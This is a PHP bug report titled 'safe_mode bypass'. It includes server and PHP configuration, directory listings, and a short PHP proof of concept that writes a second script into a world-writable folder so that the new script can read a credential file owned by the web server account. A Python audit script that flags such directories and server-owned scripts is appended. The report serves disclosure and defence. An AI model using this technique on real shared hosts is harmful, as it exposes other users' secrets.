From:             marrtins at hackers dot lv
Operating system: Linux
PHP version:      4.3.1
PHP Bug Type:     Scripting Engine problem
Bug description:  safe_mode bypass

Description:
------------
apache_1.3.27

httpd.conf
----------
User webmaster
Group nobody

./configure --activate-module=src/modules/php4/libphp4.a --enable-module=rewrite

======================================
php-4.3.0

php.ini
---------
safe_mode = On

./configure \
--with-mysql=/usr/local \
--with-mcrypt=/usr/local/lib/libmcrypt \
--with-apache=../apache_1.3.27 \
--enable-track-vars \
--with-gd=/usr/local \
--with-interbase=/opt/interbase \
--enable-trans-sid \
--with-png-dir=/usr/local \
--with-jpeg-dir=/usr/local \
--with-zlib-dir=/usr/local \
--enable-sockets \
--with-gettext \
--with-xml \
--enable-ftp \
--with-imap=/root/.hore_imp/imap-2002.RC10 \
--with-iconv=/usr/local/

======================================
~/public_html> ls -al *
drwxr-xr-x    3 test     users        4096 aug 19 19:05 .
drwx--x--x    5 test     users        4096 aug 19 19:04 ..
-rw-r--r--    1 test     users         146 aug 19 18:47 hack.php
drwxrwxrwx    2 test     users        4096 aug 19 19:03 test

after accessing http://some_server/~test/hack.php
php makes test/stole.php

~/public_html> ls -al test
drwxrwxrwx    2 test     users        4096 aug 19 19:07 .
drwxr-xr-x    3 test     users        4096 aug 19 19:05 ..
-rw-r--r--    1 webmaste nobody         61 aug 19 19:07 stole.php

after that http://some_server/~test/test/stole.php locally reads
/www/secret/pass.inc.php owned by webmaster

Reproduce code:
---------------
<?
$data='<?
$data = file(\'/www/secret/pass.inc.php\');
print_r($data);
?>';

$f=fopen('/home/test/public_html/test/stole.php', 'w');
fwrite($f, $data);
fclose($f);
?>

--
Edit bug report at http://bugs.php.net/?id=25149&edit=1
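
Added example (not part of the original report, and not PHP project code): a small audit that flags the two conditions visible in the listings above, a world-writable directory inside a user's web tree and a script file owned by the web server account, which safe_mode's owner comparison then treats as that account's own script. The names Entry, scan and audit, the ".php" extension filter and the sample data are assumptions made for this illustration.

```python
import os
import pwd
import stat
from typing import Iterable, List, NamedTuple, Tuple


class Entry(NamedTuple):
    path: str
    owner: str   # account name, or the numeric uid as text if unknown
    mode: int    # st_mode as returned by lstat()


def scan(root: str) -> Iterable[Entry]:
    """Walk a live directory tree and yield one Entry per file or directory."""
    for dirpath, dirs, files in os.walk(root):
        for name in dirs + files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            try:
                owner = pwd.getpwuid(st.st_uid).pw_name
            except KeyError:
                owner = str(st.st_uid)
            yield Entry(path, owner, st.st_mode)


def audit(entries: Iterable[Entry], httpd_user: str,
          exts: Tuple[str, ...] = (".php",)) -> List[Tuple[str, str]]:
    """Return (finding, path) pairs for upload-style directories and for
    scripts that were created by the web server account itself."""
    findings = []
    for e in entries:
        if stat.S_ISDIR(e.mode) and e.mode & stat.S_IWOTH:
            findings.append(("world-writable-dir", e.path))
        elif (stat.S_ISREG(e.mode) and e.owner == httpd_user
              and e.path.endswith(exts)):
            findings.append(("server-owned-script", e.path))
    return findings


# Constructed sample mirroring the two `ls -al` listings in the report;
# "webmaster" is the httpd.conf User value shown there.
SAMPLE = [
    Entry("/home/test/public_html/hack.php", "test", stat.S_IFREG | 0o644),
    Entry("/home/test/public_html/test", "test", stat.S_IFDIR | 0o777),
    Entry("/home/test/public_html/test/stole.php", "webmaster",
          stat.S_IFREG | 0o644),
]

if __name__ == "__main__":
    for finding, path in audit(SAMPLE, "webmaster"):
        print(finding, path)
```

On a live host, pass scan("/home") (or the relevant document root) and the httpd.conf User value to audit().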
